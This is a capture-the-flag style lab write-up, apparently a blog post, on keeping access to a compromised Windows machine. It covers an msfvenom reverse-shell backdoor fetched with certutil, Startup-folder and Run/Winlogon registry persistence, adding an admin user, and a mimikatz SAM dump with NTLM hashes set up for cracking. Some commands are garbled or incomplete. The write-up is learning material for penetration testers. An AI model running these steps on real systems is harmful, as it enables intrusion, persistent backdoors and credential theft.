2020-11-03 17:51:49 +05:00

5.7 KiB


Abdullah Rizwan | 3:06 PM | 3rd November 2020

What is persistence?

Persistence is a post-exploitation activity used by penetration testers in order to keep access to a system throughout the whole assessment and not to have to re-exploit the target even if the system restarts.

It can be considered that there are two types of persistence. These two types are:

Low privileged persistence
Privileged user persistence

Low privileged user persistence

Low privileged persistence means that the penetration tester gained and uses persistence techniques to keep his access to the target system under a normal user profile/account (a domain user with no administrative rights).

Privileged user persistence

After gaining access to a system, sometimes (because it would be inaccurate to say always), a penetration tester will do privilege escalation in order to gain access to the highest privilege user that can be on a Windows machine (nt authority\system).

After privilege escalation, he will use persistence in order to keep the access he gained.

Keeping persistence

Ways of keeping persistence:

Startup folder persistence
Editing registry keys
Using scheduled tasks
Using BITS
Creating a backdoored service
Creating another user
Backdooring RDP


Access the machine through RDP (Remote Desktop Protocol) through the credentials given


Then click on Save and Connect


Now create a backdoor through msfvenom and use metasploit to set a listener on to the port that the backdoor is set

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LHOST=6666 -f exe > backdoor.exe


Now host the backdoor on your machine

python3 -m http.server 80

And run this on target machine on cmd

certutil.exe -urlcache -f backdoor.exe

But I didn't get saved on the target machine so I tried to save it on it's home directory and it worked now start listening on metasploit and execute the backdoor on our target machine

But it didn't get worked , so now let's generate another backdoor but instead of specifiying architecture leave it

Now this worked !

Startup folder persistence

Now we can upload a backdoor that will be executed whenever the system starts up to do that we navigate to

C:\Users\tryhackme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup and here upload that backdoor

Every time a user restarts its computer and logs in the backdoor will be executed and Metasploit will receive the connection.

Editing registries

A low privileged user can still edit registries entries in a system , entry that can be edited is


On meterpreter shell type shell to get a windows cmd and then type this command

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe

Having Administrator Rights

By having high privilege rights we can add another admin user

net user /add <USER> <PASSWORD>

This will just a user to add that user in Administrator group

net localgroup Administrators <USER> /add

Editing registries

We can also get persistance through adding a registry , when a user logs on to a system Backdoor can be invoked

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, <PATH_TO_BINARY>" /f

Hash Dump

Hash dumping will not run unless you are administrator so let's switch to admin


Now , run getsystem and load kiwi then run lsa_dump_sam

Domain : PERSISTENCE                 
SysKey : 31066436b67d1dfb03c9f249b9aed099                                                                                                           
Local SID : S-1-5-21-3421978194-83625553-4099171136                       

SAMKey : d0bb192867888f2d94bc148c442c6c7c                                 

RID  : 000001f4 (500)                
User : Administrator                 
  Hash NTLM: 52745740e9a05e6195731194f03865ea                             

RID  : 000001f5 (501)                
User : Guest                         

RID  : 000001f7 (503)                
User : DefaultAccount                

RID  : 000003e8 (1000)               
User : joe                           
  Hash NTLM: 878d8014606cda29677a44efa1353fc7                             

RID  : 000003e9 (1001)               
User : chris                         
  Hash NTLM: e0b6050c7280bf4a7bee599cf374fd80                             

RID  : 000003ea (1002)               
User : tryhackme                     
  Hash NTLM: 0c7ba4684821cd349e327896d9db4474   

Now let's crack joe's and chris's password hashes



I used online crackstation to crack these hashes however they can still be cracked by using crackstation's wordlists or using seclist to crack them using hashcat or johntheripper